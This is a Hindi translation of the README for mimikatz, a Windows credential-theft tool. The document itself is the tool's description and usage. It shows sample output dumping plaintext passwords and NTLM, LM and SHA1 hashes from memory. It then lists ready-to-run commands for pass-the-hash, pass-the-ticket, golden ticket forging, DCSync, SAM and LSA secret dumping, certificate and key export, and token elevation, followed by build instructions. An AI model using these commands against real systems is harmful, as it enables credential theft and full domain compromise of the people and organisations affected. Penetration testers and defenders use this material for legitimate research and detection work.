
Windows क्रेडेंशियल्स (पासवर्ड, हैश, Kerberos टिकट) को मेमोरी से निकालने तथा pass-the-hash, pass-the-ticket और golden ticket हमले करने के लिए उपकरण
mimikatz एक उपकरण है जो मैंने C सीखने और Windows सुरक्षा के साथ कुछ प्रयोग करने के लिए बनाया है।
अब यह मेमोरी से प्लेनटेक्स्ट पासवर्ड, हैश, PIN कोड और केरबरोस टिकट निकालने के लिए प्रसिद्ध है। mimikatz pass-the-hash, pass-the-ticket या Golden tickets बनाने का कार्य भी कर सकता है।
.#####. mimikatz 2.0 alpha (x86) release "Kiwi en C" (Apr 6 2014 22:02:03)
.## ^ ##.
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( [email protected] )
'## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)
'#####' with 13 modules * * */
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 515764 (00000000:0007deb4)
Session : Interactive from 2
User Name : Gentil Kiwi
Domain : vm-w7-ult-x
SID : S-1-5-21-1982681256-1210654043-1600862990-1000
msv :
[00000003] Primary
* Username : Gentil Kiwi
* Domain : vm-w7-ult-x
* LM : d0e9aee149655a6075e4540af1f22d3b
* NTLM : cc36cf7a8514893efccd332446158b1a
* SHA1 : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
tspkg :
* Username : Gentil Kiwi
* Domain : vm-w7-ult-x
* Password : waza1234/
...
लेकिन इतना ही नहीं! Crypto, Terminal Server, Events, ... GitHub Wiki https://github.com/gentilkiwi/mimikatz/wiki या http://blog.gentilkiwi.com पर बहुत सारी जानकारी है (फ्रेंच में, हाँ)।
यदि आप इसे बनाना नहीं चाहते हैं, तो बाइनरी https://github.com/gentilkiwi/mimikatz/releases पर उपलब्ध हैं।
log
privilege::debug
sekurlsa::logonpasswords
sekurlsa::tickets /export
sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd
kerberos::list /export
kerberos::ptt c:\chocolate.kirbi
kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi
crypto::capi
crypto::cng
crypto::certificates /export
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE
crypto::keys /export
crypto::keys /machine /export
vault::cred
vault::list
token::elevate
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
token::revert
lsadump::dcsync /user:domain\krbtgt /domain:lab.local
mimikatz एक Visual Studio Solution और WinDDK ड्राइवर (मुख्य संचालन के लिए वैकल्पिक) के रूप में है, इसलिए पूर्वापेक्षाएँ हैं:
mimikatz और mimilib के लिए : Visual Studio 2010, 2012 या 2013 for Desktop (2013 Express for Desktop मुफ़्त है और x86 व x64 समर्थन करता है - http://www.microsoft.com/download/details.aspx?id=44914)mimikatz driver, mimilove (और ddk2003 प्लेटफ़ॉर्म) के लिए : Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800mimikatz सोर्स नियंत्रण के लिए SVN का उपयोग करता है, लेकिन अब GIT के साथ भी उपलब्ध है! आप सिंक करने के लिए कोई भी टूल उपयोग कर सकते हैं, यहाँ तक कि Visual Studio 2013 में शामिल GIT भी =)
Build / Build Solution (आप आर्किटेक्चर बदल सकते हैं)mimikatz अब बन गया है और उपयोग के लिए तैयार है! (Win32 / x64 यहाँ तक कि ARM64 अगर आप भाग्यशाली हैं)
_build_.cmd और mimidrv के बारे में MSB3073 त्रुटि मिल सकती है, ऐसा इसलिए है क्योंकि Windows Driver Kit 7.1 (WinDDK) के बिना ड्राइवर नहीं बनाया जा सकता है, लेकिन mimikatz और mimilib ठीक हैं।इस वैकल्पिक MSBuild प्लेटफ़ॉर्म के साथ, आप WinDDK बिल्ड टूल और डिफ़ॉल्ट msvcrt रनटाइम का उपयोग कर सकते हैं (छोटे बाइनरी, कोई निर्भरता नहीं)
इस वैकल्पिक प्लेटफ़ॉर्म के लिए, Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800 और Visual Studio 2010 अनिवार्य हैं, भले ही आप बाद में Visual Studio 2012 या 2013 उपयोग करने की योजना बनाते हैं।
निर्देशों का पालन करें:
CC BY 4.0 लाइसेंस - https://creativecommons.org/licenses/by/4.0/
mimikatz को विकसित करने के लिए कॉफ़ी की आवश्यकता है:
gentilkiwi, आप मुझसे Twitter ( @gentilkiwi ) या मेल ( benjamin [at] gentilkiwi.com ) पर संपर्क कर सकते हैंlsadump मॉड्यूल में DCSync और DCShadow फ़ंक्शन Vincent LE TOUX के साथ सह-लिखे गए थे, आप उनसे मेल ( vincent.letoux [at] gmail.com ) द्वारा संपर्क कर सकते हैं या उनकी वेबसाइट ( http://www.mysmartlogon.com ) देख सकते हैंयह एक व्यक्तिगत विकास है, कृपया इसके दर्शन का सम्मान करें और इसका उपयोग बुरे कार्यों के लिए न करें!